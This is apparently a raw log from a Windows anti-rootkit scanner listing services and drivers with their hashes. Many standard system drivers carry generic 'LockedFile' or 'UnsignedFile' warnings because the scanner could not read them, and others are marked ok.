23:23:51.0476 0x18fc  HdAudAddService ( LockedFile.Multi.Generic ) - warning
23:23:51.0536 0x18fc  [ 0A49913402747A0B67DE940FB42CBDBB, 61A45DBDCEB4A2D5C3C28F6BC8C5ADC51D0240A7553DF44BCC4355FC06F72B83 ] HDAudBus        C:\Windows\system32\DRIVERS\HDAudBus.sys
23:23:51.0536 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\HDAudBus.sys. md5: 0A49913402747A0B67DE940FB42CBDBB, sha256: 61A45DBDCEB4A2D5C3C28F6BC8C5ADC51D0240A7553DF44BCC4355FC06F72B83
23:23:51.0536 0x18fc  HDAudBus - detected LockedFile.Multi.Generic ( 1 )
23:23:51.0536 0x18fc  Object is SCO, delete is not allowed
23:23:51.0536 0x18fc  HDAudBus ( LockedFile.Multi.Generic ) - warning
23:23:51.0536 0x18fc  Force sending object to P2P due to detect: HDAudBus
23:23:51.0546 0x18fc  Object send P2P result: false
23:23:51.0546 0x18fc  [ 78E86380454A7B10A5EB255DC44A355F, 11F3ED7ACFFA3024B9BD504F81AC39F5B4CED5A8A425E8BADF7132EFEDB9BD64 ] HidBatt         C:\Windows\system32\DRIVERS\HidBatt.sys
23:23:51.0546 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\HidBatt.sys. md5: 78E86380454A7B10A5EB255DC44A355F, sha256: 11F3ED7ACFFA3024B9BD504F81AC39F5B4CED5A8A425E8BADF7132EFEDB9BD64
23:23:51.0546 0x18fc  HidBatt - detected LockedFile.Multi.Generic ( 1 )
23:23:51.0546 0x18fc  HidBatt ( LockedFile.Multi.Generic ) - warning
23:23:51.0546 0x18fc  Force sending object to P2P due to detect: HidBatt
23:23:51.0546 0x18fc  Object send P2P result: false
23:23:51.0576 0x18fc  [ 7FD2A313F7AFE5C4DAB14798C48DD104, 94CBFD4506CBDE4162CEB3367BAB042D19ACA6785954DC0B554D4164B9FCD0D4 ] HidBth          C:\Windows\system32\DRIVERS\hidbth.sys
23:23:51.0576 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\hidbth.sys. md5: 7FD2A313F7AFE5C4DAB14798C48DD104, sha256: 94CBFD4506CBDE4162CEB3367BAB042D19ACA6785954DC0B554D4164B9FCD0D4
23:23:51.0576 0x18fc  HidBth - detected LockedFile.Multi.Generic ( 1 )
23:23:51.0576 0x18fc  Object is SCO, delete is not allowed
23:23:51.0576 0x18fc  HidBth ( LockedFile.Multi.Generic ) - warning
23:23:51.0576 0x18fc  Force sending object to P2P due to detect: HidBth
23:23:51.0576 0x18fc  Object send P2P result: false
23:23:51.0596 0x18fc  [ 0A77D29F311B88CFAE3B13F9C1A73825, 8615DC6CEFB591505CE16E054A71A4F371B827DDFD5E980777AB4233DCFDA01D ] HidIr           C:\Windows\system32\DRIVERS\hidir.sys
23:23:51.0596 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\hidir.sys. md5: 0A77D29F311B88CFAE3B13F9C1A73825, sha256: 8615DC6CEFB591505CE16E054A71A4F371B827DDFD5E980777AB4233DCFDA01D
23:23:51.0596 0x18fc  HidIr - detected LockedFile.Multi.Generic ( 1 )
23:23:51.0596 0x18fc  Object is SCO, delete is not allowed
23:23:51.0596 0x18fc  HidIr ( LockedFile.Multi.Generic ) - warning
23:23:51.0596 0x18fc  Force sending object to P2P due to detect: HidIr
23:23:51.0596 0x18fc  Object send P2P result: false
23:23:51.0648 0x18fc  [ BD9EB3958F213F96B97B1D897DEE006D, 4D01CBF898B528B3A4E5A683DF2177300AFABD7D4CB51F1A7891B1B545499631 ] hidserv         C:\Windows\system32\hidserv.dll
23:23:51.0688 0x18fc  hidserv - ok
23:23:51.0761 0x18fc  [ B3BF6B5B50006DEF50B66306D99FCF6F, D39A1DEBE7C464922919826D15199ED25E263BF58633593DD412D78F98921417 ] HidUsb          C:\Windows\system32\DRIVERS\hidusb.sys
23:23:51.0761 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\hidusb.sys. md5: B3BF6B5B50006DEF50B66306D99FCF6F, sha256: D39A1DEBE7C464922919826D15199ED25E263BF58633593DD412D78F98921417
23:23:51.0762 0x18fc  HidUsb - detected LockedFile.Multi.Generic ( 1 )
23:23:51.0762 0x18fc  Object is SCO, delete is not allowed
23:23:51.0762 0x18fc  HidUsb ( LockedFile.Multi.Generic ) - warning
23:23:51.0890 0x18fc  [ 492572D5C65636F598739552EBA3D3C1, 866C4683007E0DA2AD2B219A80B6EF34EE6972F8B5A248605AB39F735F0FF6DC ] HiPatchService  C:\Program Files (x86)\Hi-Rez Studios\HiPatchService.exe
23:23:51.0900 0x18fc  HiPatchService - detected UnsignedFile.Multi.Generic ( 1 )
23:23:51.0900 0x18fc  HiPatchService ( UnsignedFile.Multi.Generic ) - warning
23:23:51.0990 0x18fc  [ EFA58EDE58DD74388FFD04CB32681518, 76D81F9BC1A4D85A779B79DEC23B79F1568AA236CD49247414093CDC1FCC150F ] hkmsvc          C:\Windows\system32\kmsvc.dll
23:23:52.0102 0x18fc  hkmsvc - ok
23:23:52.0175 0x18fc  [ 046B2673767CA626E2CFB7FDF735E9E8, 9C932DCC5DE9B1919AB38C01D76AD7BBAF491DE6D158662407974748BC0B4C6C ] HomeGroupListener C:\Windows\system32\ListSvc.dll
23:23:52.0234 0x18fc  HomeGroupListener - ok
23:23:52.0299 0x18fc  [ 06A7422224D9865A5613710A089987DF, EF604B4B6918D3FDC8E90ED9004E6E7340E0F399C214C65CCE3A7C8C576FA1C0 ] HomeGroupProvider C:\Windows\system32\provsvc.dll
23:23:52.0338 0x18fc  HomeGroupProvider - ok
23:23:52.0374 0x18fc  [ 0886D440058F203EBA0E1825E4355914, BC49C4CEFE324A08C864A4BF4FEA9A70151FAB7CC30BDC28344F3FFD2F500070 ] HpSAMD          C:\Windows\system32\DRIVERS\HpSAMD.sys
23:23:52.0374 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\HpSAMD.sys. md5: 0886D440058F203EBA0E1825E4355914, sha256: BC49C4CEFE324A08C864A4BF4FEA9A70151FAB7CC30BDC28344F3FFD2F500070
23:23:52.0375 0x18fc  HpSAMD - detected LockedFile.Multi.Generic ( 1 )
23:23:52.0375 0x18fc  HpSAMD ( LockedFile.Multi.Generic ) - warning
23:23:52.0375 0x18fc  Force sending object to P2P due to detect: HpSAMD
23:23:52.0376 0x18fc  Object send P2P result: false
23:23:52.0658 0x18fc  [ CEE049CAC4EFA7F4E1E4AD014414A5D4, 433AE2D845850F1D7A48275BBD87B3F0E7DD48F2282C727C4B777ECD92CC331D ] HTTP            C:\Windows\system32\drivers\HTTP.sys
23:23:52.0658 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\drivers\HTTP.sys. md5: CEE049CAC4EFA7F4E1E4AD014414A5D4, sha256: 433AE2D845850F1D7A48275BBD87B3F0E7DD48F2282C727C4B777ECD92CC331D
23:23:52.0658 0x18fc  HTTP - detected LockedFile.Multi.Generic ( 1 )
23:23:52.0658 0x18fc  Object is SCO, delete is not allowed
23:23:52.0658 0x18fc  HTTP ( LockedFile.Multi.Generic ) - warning
23:23:52.0708 0x18fc  [ F17766A19145F111856378DF337A5D79, FC1633FB865A5324EBCBE5F97D297B899FABBDD965D862C2EFC743CD36F47E62 ] hwpolicy        C:\Windows\system32\drivers\hwpolicy.sys
23:23:52.0708 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\drivers\hwpolicy.sys. md5: F17766A19145F111856378DF337A5D79, sha256: FC1633FB865A5324EBCBE5F97D297B899FABBDD965D862C2EFC743CD36F47E62
23:23:52.0708 0x18fc  hwpolicy - detected LockedFile.Multi.Generic ( 1 )
23:23:52.0708 0x18fc  hwpolicy ( LockedFile.Multi.Generic ) - warning
23:23:52.0738 0x18fc  [ FA55C73D4AFFA7EE23AC4BE53B4592D3, 65CDDC62B89A60E942C5642C9D8B539EFB69DA8069B4A2E54978154B314531CD ] i8042prt        C:\Windows\system32\DRIVERS\i8042prt.sys
23:23:52.0738 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\i8042prt.sys. md5: FA55C73D4AFFA7EE23AC4BE53B4592D3, sha256: 65CDDC62B89A60E942C5642C9D8B539EFB69DA8069B4A2E54978154B314531CD
23:23:52.0738 0x18fc  i8042prt - detected LockedFile.Multi.Generic ( 1 )
23:23:52.0738 0x18fc  Object is SCO, delete is not allowed
23:23:52.0738 0x18fc  i8042prt ( LockedFile.Multi.Generic ) - warning
23:23:52.0768 0x18fc  [ D83EFB6FD45DF9D55E9A1AFC63640D50, 0494F8F7CB3ED11FD8D0B838CB71271AF7A3CBFCB7F2CB043A9392B5106A3C7B ] iaStorV         C:\Windows\system32\DRIVERS\iaStorV.sys
23:23:52.0768 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\iaStorV.sys. md5: D83EFB6FD45DF9D55E9A1AFC63640D50, sha256: 0494F8F7CB3ED11FD8D0B838CB71271AF7A3CBFCB7F2CB043A9392B5106A3C7B
23:23:52.0768 0x18fc  iaStorV - detected LockedFile.Multi.Generic ( 1 )
23:23:52.0778 0x18fc  Object is SCO, delete is not allowed
23:23:52.0778 0x18fc  iaStorV ( LockedFile.Multi.Generic ) - warning
23:23:52.0778 0x18fc  Force sending object to P2P due to detect: iaStorV
23:23:52.0788 0x18fc  Object send P2P result: false
23:23:53.0170 0x18fc  [ 2F2BE70D3E02B6FA877921AB9516D43C, E04255EE4BD95FC1539EB1EB9F702B039F65993D31A4531DA487274543EF5226 ] idsvc           C:\Windows\Microsoft.NET\Framework64\v3.0\Windows Communication Foundation\infocard.exe
23:23:53.0230 0x18fc  idsvc - ok
23:23:53.0250 0x18fc  [ 5C18831C61933628F5BB0EA2675B9D21, 5CD9DE2F8C0256623A417B5C55BF55BB2562BD7AB2C3C83BB3D9886C2FBDA4E4 ] iirsp           C:\Windows\system32\DRIVERS\iirsp.sys
23:23:53.0260 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\iirsp.sys. md5: 5C18831C61933628F5BB0EA2675B9D21, sha256: 5CD9DE2F8C0256623A417B5C55BF55BB2562BD7AB2C3C83BB3D9886C2FBDA4E4
23:23:53.0260 0x18fc  iirsp - detected LockedFile.Multi.Generic ( 1 )
23:23:53.0260 0x18fc  Object is SCO, delete is not allowed
23:23:53.0260 0x18fc  iirsp ( LockedFile.Multi.Generic ) - warning
23:23:53.0605 0x18fc  [ C5B4683680DF085B57BC53E5EF34861F, 9C06517DFCB3ED7BB1166F7EB6CCC8713E6B68283C75420C0EDC182094AA1B8F ] IKEEXT          C:\Windows\System32\ikeext.dll
23:23:53.0705 0x18fc  IKEEXT - ok
23:23:54.0376 0x18fc  [ CCEDD47ABD068C58C8513DEB785093BB, 2B5571688655265037ACB44D2F2E0CD646EC0567D823C32CA09F13A1814C241B ] IntcAzAudAddService C:\Windows\system32\drivers\RTKVHD64.sys
23:23:54.0386 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\drivers\RTKVHD64.sys. md5: CCEDD47ABD068C58C8513DEB785093BB, sha256: 2B5571688655265037ACB44D2F2E0CD646EC0567D823C32CA09F13A1814C241B
23:23:54.0393 0x18fc  IntcAzAudAddService - detected LockedFile.Multi.Generic ( 1 )
23:23:54.0393 0x18fc  IntcAzAudAddService ( LockedFile.Multi.Generic ) - warning
23:23:54.0393 0x18fc  Force sending object to P2P due to detect: IntcAzAudAddService
23:23:54.0405 0x18fc  Object send P2P result: false
23:23:54.0449 0x18fc  [ F00F20E70C6EC3AA366910083A0518AA, E2F3E9FFD82C802C8BAC309893A3664ACF16A279959C0FDECCA64C3D3C60FD22 ] intelide        C:\Windows\system32\DRIVERS\intelide.sys
23:23:54.0449 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\intelide.sys. md5: F00F20E70C6EC3AA366910083A0518AA, sha256: E2F3E9FFD82C802C8BAC309893A3664ACF16A279959C0FDECCA64C3D3C60FD22
23:23:54.0449 0x18fc  intelide - detected LockedFile.Multi.Generic ( 1 )
23:23:54.0450 0x18fc  Object is SCO, delete is not allowed
23:23:54.0450 0x18fc  intelide ( LockedFile.Multi.Generic ) - warning
23:23:54.0450 0x18fc  Force sending object to P2P due to detect: intelide
23:23:54.0451 0x18fc  Object send P2P result: false
23:24:00.0092 0x18fc  Ndisuio - detected LockedFile.Multi.Generic ( 1 )
23:24:00.0092 0x18fc  Object is SCO, delete is not allowed
23:24:00.0092 0x18fc  Ndisuio ( LockedFile.Multi.Generic ) - warning
23:24:00.0122 0x18fc  [ 557DFAB9CA1FCB036AC77564C010DAD3, 8A21B342AFE5B498FB62EDDC81A3ADA9570677B7A382666090E0ABB1F85FEF29 ] NdisWan         C:\Windows\system32\DRIVERS\ndiswan.sys
23:24:00.0122 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\ndiswan.sys. md5: 557DFAB9CA1FCB036AC77564C010DAD3, sha256: 8A21B342AFE5B498FB62EDDC81A3ADA9570677B7A382666090E0ABB1F85FEF29
23:24:00.0122 0x18fc  NdisWan - detected LockedFile.Multi.Generic ( 1 )
23:24:00.0122 0x18fc  Object is SCO, delete is not allowed
23:24:00.0122 0x18fc  NdisWan ( LockedFile.Multi.Generic ) - warning
23:24:00.0122 0x18fc  Force sending object to P2P due to detect: NdisWan
23:24:00.0122 0x18fc  Object send P2P result: false
23:24:00.0172 0x18fc  [ 659B74FB74B86228D6338D643CD3E3CF, 83D741B7A2A204A661A80C226212749F514800060D05E217FA6DC14D62F38F80 ] NDProxy         C:\Windows\system32\drivers\NDProxy.sys
23:24:00.0172 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\drivers\NDProxy.sys. md5: 659B74FB74B86228D6338D643CD3E3CF, sha256: 83D741B7A2A204A661A80C226212749F514800060D05E217FA6DC14D62F38F80
23:24:00.0172 0x18fc  NDProxy - detected LockedFile.Multi.Generic ( 1 )
23:24:00.0172 0x18fc  Object is SCO, delete is not allowed
23:24:00.0172 0x18fc  NDProxy ( LockedFile.Multi.Generic ) - warning
23:24:00.0182 0x18fc  [ 86743D9F5D2B1048062B14B1D84501C4, DBF6D6A60AB774FCB0F464FF2D285A7521D0A24006687B243AB46B17D8032062 ] NetBIOS         C:\Windows\system32\DRIVERS\netbios.sys
23:24:00.0182 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\netbios.sys. md5: 86743D9F5D2B1048062B14B1D84501C4, sha256: DBF6D6A60AB774FCB0F464FF2D285A7521D0A24006687B243AB46B17D8032062
23:24:00.0182 0x18fc  NetBIOS - detected LockedFile.Multi.Generic ( 1 )
23:24:00.0192 0x18fc  Object is SCO, delete is not allowed
23:24:00.0192 0x18fc  NetBIOS ( LockedFile.Multi.Generic ) - warning
23:24:00.0264 0x18fc  [ 9162B273A44AB9DCE5B44362731D062A, 5A1BA6DBFEBB2618DC9D4CC55FA071C170A5D22FFB24CE62DD5B3210D8B45F39 ] NetBT           C:\Windows\system32\DRIVERS\netbt.sys
23:24:00.0264 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\netbt.sys. md5: 9162B273A44AB9DCE5B44362731D062A, sha256: 5A1BA6DBFEBB2618DC9D4CC55FA071C170A5D22FFB24CE62DD5B3210D8B45F39
23:24:00.0264 0x18fc  NetBT - detected LockedFile.Multi.Generic ( 1 )
23:24:00.0264 0x18fc  Object is SCO, delete is not allowed
23:24:00.0264 0x18fc  NetBT ( LockedFile.Multi.Generic ) - warning
23:24:00.0264 0x18fc  Force sending object to P2P due to detect: NetBT
23:24:00.0264 0x18fc  Object send P2P result: false
23:24:00.0314 0x18fc  [ 0793F40B9B8A1BDD266296409DBD91EA, 8A383FC9A66A327905C340D06138980F9E489479535A2C2AAE5E8BB14A74826E ] Netlogon        C:\Windows\system32\lsass.exe
23:24:00.0324 0x18fc  Netlogon - ok
23:24:00.0386 0x18fc  [ 847D3AE376C0817161A14A82C8922A9E, 37AE692B3481323134125EF58F2C3CBC20177371AF2F5874F53DD32A827CB936 ] Netman          C:\Windows\System32\netman.dll
23:24:00.0456 0x18fc  Netman - ok
23:24:00.0572 0x18fc  [ 9A7D3A1AA5C830744FF6C44BB55A347A, 42D3281893DB4C0DDA6A7BDA92D3CCE23968D0E3CF880777B8DBBFD955629B08 ] NetMsmqActivator C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
23:24:00.0700 0x18fc  NetMsmqActivator - ok
23:24:00.0700 0x18fc  [ 9A7D3A1AA5C830744FF6C44BB55A347A, 42D3281893DB4C0DDA6A7BDA92D3CCE23968D0E3CF880777B8DBBFD955629B08 ] NetPipeActivator C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
23:24:00.0710 0x18fc  NetPipeActivator - ok
23:24:00.0800 0x18fc  [ 5F28111C648F1E24F7DBC87CDEB091B8, 2E8645285921EDB98BB2173E11E57459C888D52E80D85791D169C869DE8813B9 ] netprofm        C:\Windows\System32\netprofm.dll
23:24:00.0860 0x18fc  netprofm - ok
23:24:00.0870 0x18fc  [ 9A7D3A1AA5C830744FF6C44BB55A347A, 42D3281893DB4C0DDA6A7BDA92D3CCE23968D0E3CF880777B8DBBFD955629B08 ] NetTcpActivator C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
23:24:00.0880 0x18fc  NetTcpActivator - ok
23:24:00.0880 0x18fc  [ 9A7D3A1AA5C830744FF6C44BB55A347A, 42D3281893DB4C0DDA6A7BDA92D3CCE23968D0E3CF880777B8DBBFD955629B08 ] NetTcpPortSharing C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
23:24:00.0890 0x18fc  NetTcpPortSharing - ok
23:24:00.0960 0x18fc  [ 77889813BE4D166CDAB78DDBA990DA92, 2EF531AE502B943632EEC66A309A8BFCDD36120A5E1473F4AAF3C2393AD0E6A3 ] nfrd960         C:\Windows\system32\DRIVERS\nfrd960.sys
23:24:00.0960 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\nfrd960.sys. md5: 77889813BE4D166CDAB78DDBA990DA92, sha256: 2EF531AE502B943632EEC66A309A8BFCDD36120A5E1473F4AAF3C2393AD0E6A3
23:24:00.0960 0x18fc  nfrd960 - detected LockedFile.Multi.Generic ( 1 )
23:24:00.0960 0x18fc  Object is SCO, delete is not allowed
23:24:00.0960 0x18fc  nfrd960 ( LockedFile.Multi.Generic ) - warning
23:24:00.0960 0x18fc  Force sending object to P2P due to detect: nfrd960
23:24:00.0960 0x18fc  Object send P2P result: false
23:24:01.0050 0x18fc  [ D9A0CE66046D6EFA0C61BAA885CBA0A8, 06C3331C7F3EE0E0B95E8302CB80315E965587C4D6231785B8ACF3FAE4731FAF ] NlaSvc          C:\Windows\System32\nlasvc.dll
23:24:01.0160 0x18fc  NlaSvc - ok
23:24:01.0200 0x18fc  [ 1E4C4AB5C9B8DD13179BBDC75A2A01F7, D8957EF7060A69DBB3CD6B2C45B1E4143592AB8D018471E17AC04668157DC67F ] Npfs            C:\Windows\system32\drivers\Npfs.sys
23:24:01.0200 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\drivers\Npfs.sys. md5: 1E4C4AB5C9B8DD13179BBDC75A2A01F7, sha256: D8957EF7060A69DBB3CD6B2C45B1E4143592AB8D018471E17AC04668157DC67F
23:24:01.0200 0x18fc  Npfs - detected LockedFile.Multi.Generic ( 1 )
23:24:01.0200 0x18fc  Object is SCO, delete is not allowed
23:24:01.0200 0x18fc  Npfs ( LockedFile.Multi.Generic ) - warning
23:24:01.0200 0x18fc  Force sending object to P2P due to detect: Npfs
23:24:01.0220 0x18fc  Object send P2P result: false
23:24:01.0280 0x18fc  [ D54BFDF3E0C953F823B3D0BFE4732528, 497A1DCC5646EC22119273216DF10D5442D16F83E4363770F507518CF6EAA53A ] nsi             C:\Windows\system32\nsisvc.dll
23:24:01.0340 0x18fc  nsi - ok
23:24:01.0350 0x18fc  [ E7F5AE18AF4168178A642A9247C63001, 133023B7E4BA8049C4CAED3282BDD25571D1CC25FAC3B820C7F981D292689D76 ] nsiproxy        C:\Windows\system32\drivers\nsiproxy.sys
23:24:01.0350 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\drivers\nsiproxy.sys. md5: E7F5AE18AF4168178A642A9247C63001, sha256: 133023B7E4BA8049C4CAED3282BDD25571D1CC25FAC3B820C7F981D292689D76
23:24:01.0350 0x18fc  nsiproxy - detected LockedFile.Multi.Generic ( 1 )
23:24:01.0350 0x18fc  Object is SCO, delete is not allowed
23:24:01.0350 0x18fc  nsiproxy ( LockedFile.Multi.Generic ) - warning
23:24:01.0540 0x18fc  [ 356698A13C4630D5B31C37378D469196, BF5704AADE5C3DA370501747F12ED6E9C3349E342CCF89005AAE132B570BB42B ] Ntfs            C:\Windows\system32\drivers\Ntfs.sys
23:24:01.0540 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\drivers\Ntfs.sys. md5: 356698A13C4630D5B31C37378D469196, sha256: BF5704AADE5C3DA370501747F12ED6E9C3349E342CCF89005AAE132B570BB42B
23:24:01.0540 0x18fc  Ntfs - detected LockedFile.Multi.Generic ( 1 )
23:24:01.0540 0x18fc  Object is SCO, delete is not allowed
23:24:01.0540 0x18fc  Ntfs ( LockedFile.Multi.Generic ) - warning
23:24:01.0540 0x18fc  Force sending object to P2P due to detect: Ntfs
23:24:01.0550 0x18fc  Object send P2P result: false
23:24:01.0560 0x18fc  [ 9899284589F75FA8724FF3D16AED75C1, 181188599FD5D4DE33B97010D9E0CAEABAB9A3EF50712FE7F9AA0735CD0666D6 ] Null            C:\Windows\system32\drivers\Null.sys
23:24:01.0560 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\drivers\Null.sys. md5: 9899284589F75FA8724FF3D16AED75C1, sha256: 181188599FD5D4DE33B97010D9E0CAEABAB9A3EF50712FE7F9AA0735CD0666D6
23:24:01.0570 0x18fc  Null - detected LockedFile.Multi.Generic ( 1 )
23:24:01.0570 0x18fc  Object is SCO, delete is not allowed
23:24:01.0570 0x18fc  Null ( LockedFile.Multi.Generic ) - warning
23:24:01.0570 0x18fc  Force sending object to P2P due to detect: Null
23:24:01.0570 0x18fc  Object send P2P result: false
23:24:01.0602 0x18fc  [ 3E38712941E9BB4DDBEE00AFFE3FED3D, 03F27CC0EF0A86D0B2DAAB6F72838CB2AB57FE5D40074828D5B7F118CD5CBEE7 ] nvraid          C:\Windows\system32\DRIVERS\nvraid.sys
23:24:01.0603 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\nvraid.sys. md5: 3E38712941E9BB4DDBEE00AFFE3FED3D, sha256: 03F27CC0EF0A86D0B2DAAB6F72838CB2AB57FE5D40074828D5B7F118CD5CBEE7
23:24:01.0603 0x18fc  nvraid - detected LockedFile.Multi.Generic ( 1 )
23:24:01.0604 0x18fc  Object is SCO, delete is not allowed
23:24:01.0604 0x18fc  nvraid ( LockedFile.Multi.Generic ) - warning
23:24:01.0672 0x18fc  [ 477DC4D6DEB99BE37084C9AC6D013DA1, E58C4D621CAAB1C68FB4A056576F48BC87913A5EBF0B511EFFB8F38C7D3E516E ] nvstor          C:\Windows\system32\DRIVERS\nvstor.sys
23:24:01.0672 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\nvstor.sys. md5: 477DC4D6DEB99BE37084C9AC6D013DA1, sha256: E58C4D621CAAB1C68FB4A056576F48BC87913A5EBF0B511EFFB8F38C7D3E516E
23:24:01.0672 0x18fc  nvstor - detected LockedFile.Multi.Generic ( 1 )
23:24:01.0672 0x18fc  Object is SCO, delete is not allowed
23:24:01.0672 0x18fc  nvstor ( LockedFile.Multi.Generic ) - warning
23:24:01.0672 0x18fc  Force sending object to P2P due to detect: nvstor
23:24:01.0672 0x18fc  Object send P2P result: false
23:24:01.0732 0x18fc  [ 270D7CD42D6E3979F6DD0146650F0E05, 752489E54C9004EDCBE1F1F208FFD864DA5C83E59A2DDE6B3E0D63ECA996F76F ] nv_agp          C:\Windows\system32\DRIVERS\nv_agp.sys
23:24:01.0732 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\nv_agp.sys. md5: 270D7CD42D6E3979F6DD0146650F0E05, sha256: 752489E54C9004EDCBE1F1F208FFD864DA5C83E59A2DDE6B3E0D63ECA996F76F
23:24:01.0732 0x18fc  nv_agp - detected LockedFile.Multi.Generic ( 1 )
23:24:01.0732 0x18fc  Object is SCO, delete is not allowed
23:24:01.0732 0x18fc  nv_agp ( LockedFile.Multi.Generic ) - warning
23:24:01.0732 0x18fc  Force sending object to P2P due to detect: nv_agp
23:24:01.0732 0x18fc  Object send P2P result: false
23:24:01.0762 0x18fc  [ 3589478E4B22CE21B41FA1BFC0B8B8A0, AD2469FC753FE552CB809FF405A9AB23E7561292FE89117E3B3B62057EFF0203 ] ohci1394        C:\Windows\system32\DRIVERS\ohci1394.sys
23:24:01.0762 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\ohci1394.sys. md5: 3589478E4B22CE21B41FA1BFC0B8B8A0, sha256: AD2469FC753FE552CB809FF405A9AB23E7561292FE89117E3B3B62057EFF0203
23:24:01.0762 0x18fc  ohci1394 - detected LockedFile.Multi.Generic ( 1 )
23:24:01.0762 0x18fc  Object is SCO, delete is not allowed
23:24:01.0762 0x18fc  ohci1394 ( LockedFile.Multi.Generic ) - warning
23:24:01.0762 0x18fc  Force sending object to P2P due to detect: ohci1394
23:24:01.0762 0x18fc  Object send P2P result: false
23:24:01.0932 0x18fc  [ 9D10F99A6712E28F8ACD5641E3A7EA6B, 70964A0ED9011EA94044E15FA77EDD9CF535CC79ED8E03A3721FF007E69595CC ] ose             C:\Program Files (x86)\Common Files\Microsoft Shared\Source Engine\OSE.EXE
23:24:01.0942 0x18fc  ose - ok
23:24:02.0459 0x18fc  [ 61BFFB5F57AD12F83AB64B7181829B34, 1DD0DD35E4158F95765EE6639F217DF03A0A19E624E020DBA609268C08A13846 ] osppsvc         C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE
23:24:02.0634 0x18fc  osppsvc - ok
23:24:02.0724 0x18fc  [ 3EAC4455472CC2C97107B5291E0DCAFE, E51F373F2DBEAEE516B42BAE8C1B5BB68D00B881323E842CB6EDEC0A183CFFC3 ] p2pimsvc        C:\Windows\system32\pnrpsvc.dll
23:24:02.0774 0x18fc  p2pimsvc - ok
23:24:02.0864 0x18fc  [ 927463ECB02179F88E4B9A17568C63C3, FEFD3447692C277D59EEC7BF218552C8BB6B8C98C26E973675549628408B94CE ] p2psvc          C:\Windows\system32\p2psvc.dll
23:24:03.0064 0x18fc  p2psvc - ok
23:24:03.0116 0x18fc  [ 0086431C29C35BE1DBC43F52CC273887, 0D116D49EF9ABB57DA005764F25E692622210627FC2048F06A989B12FA8D0A80 ] Parport         C:\Windows\system32\DRIVERS\parport.sys
23:24:03.0116 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\parport.sys. md5: 0086431C29C35BE1DBC43F52CC273887, sha256: 0D116D49EF9ABB57DA005764F25E692622210627FC2048F06A989B12FA8D0A80
23:24:03.0116 0x18fc  Parport - detected LockedFile.Multi.Generic ( 1 )
23:24:03.0116 0x18fc  Object is SCO, delete is not allowed
23:24:03.0116 0x18fc  Parport ( LockedFile.Multi.Generic ) - warning
23:24:03.0156 0x18fc  [ 7DAA117143316C4A1537E074A5A9EAF0, D4F31F67BE09B6904C1B9702DC042BC0DAB628055B956C79FF760A9027679E6B ] partmgr         C:\Windows\system32\drivers\partmgr.sys
23:24:03.0156 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\drivers\partmgr.sys. md5: 7DAA117143316C4A1537E074A5A9EAF0, sha256: D4F31F67BE09B6904C1B9702DC042BC0DAB628055B956C79FF760A9027679E6B
23:24:03.0156 0x18fc  partmgr - detected LockedFile.Multi.Generic ( 1 )
23:24:03.0156 0x18fc  Object is SCO, delete is not allowed
23:24:03.0156 0x18fc  partmgr ( LockedFile.Multi.Generic ) - warning
23:24:03.0156 0x18fc  Force sending object to P2P due to detect: partmgr
23:24:03.0156 0x18fc  Object send P2P result: false
23:24:03.0226 0x18fc  [ 3AEAA8B561E63452C655DC0584922257, 04C072969B58657602EB0C21CEDF24FCEE14E61B90A0F758F93925EF2C9FC32D ] PcaSvc          C:\Windows\System32\pcasvc.dll
23:24:03.0266 0x18fc  PcaSvc - ok
23:24:03.0326 0x18fc  [ F36F6504009F2FB0DFD1B17A116AD74B, 33A4C217F7DC5E5B7E1B6CF335327C8FE6CC5D6D048D420252965574CAD83918 ] pci             C:\Windows\system32\DRIVERS\pci.sys
23:24:03.0326 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\pci.sys. md5: F36F6504009F2FB0DFD1B17A116AD74B, sha256: 33A4C217F7DC5E5B7E1B6CF335327C8FE6CC5D6D048D420252965574CAD83918
23:24:03.0336 0x18fc  pci - detected LockedFile.Multi.Generic ( 1 )
23:24:03.0336 0x18fc  Object is SCO, delete is not allowed
23:24:03.0336 0x18fc  pci ( LockedFile.Multi.Generic ) - warning
23:24:03.0356 0x18fc  [ B5B8B5EF2E5CB34DF8DCF8831E3534FA, F2A7CC645B96946CC65BF60E14E70DC09C848D27C7943CE5DEA0C01A6B863480 ] pciide          C:\Windows\system32\DRIVERS\pciide.sys
